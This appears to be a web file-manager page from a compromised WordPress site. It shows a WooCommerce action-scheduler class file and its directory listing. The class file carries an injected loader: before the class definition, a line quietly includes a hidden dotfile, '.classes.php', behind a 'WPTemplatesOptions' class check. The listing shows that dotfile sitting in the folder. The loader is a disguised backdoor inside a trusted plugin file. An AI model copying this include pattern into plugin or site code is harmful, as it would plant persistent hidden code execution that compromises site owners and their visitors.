PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
woocommerce
/
packages
/
action-scheduler
/
classes
<?php /** * Class ActionScheduler_NullLogEntry */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class ActionScheduler_NullLogEntry extends ActionScheduler_LogEntry { public function __construct( $action_id = '', $message = '' ) { // nothing to see here } }
[+]
..
[+]
actions
[-] ActionScheduler_AsyncRequest_QueueRunner.php
[edit]
[-] .classes.php
[edit]
[-] ActionScheduler_Exception.php
[edit]
[-] ActionScheduler_InvalidActionException.php
[edit]
[-] ActionScheduler_WPCommentCleaner.php
[edit]
[+]
schema
[+]
WP_CLI
[-] ActionScheduler_ListTable.php
[edit]
[+]
data-stores
[-] ActionScheduler_OptionLock.php
[edit]
[-] ActionScheduler_LogEntry.php
[edit]
[-] ActionScheduler_Versions.php
[edit]
[-] ActionScheduler_ActionFactory.php
[edit]
[-] ActionScheduler_DataController.php
[edit]
[-] ActionScheduler_QueueRunner.php
[edit]
[-] ActionScheduler_AdminView.php
[edit]
[-] ActionScheduler_wcSystemStatus.php
[edit]
[-] ActionScheduler_FatalErrorMonitor.php
[edit]
[-] ActionScheduler_DateTime.php
[edit]
[+]
migration
[-] ActionScheduler_NullLogEntry.php
[edit]
[-] ActionScheduler_QueueCleaner.php
[edit]
[+]
schedules
[-] ActionScheduler_Compatibility.php
[edit]
[+]
abstracts
[-] ActionScheduler_ActionClaim.php
[edit]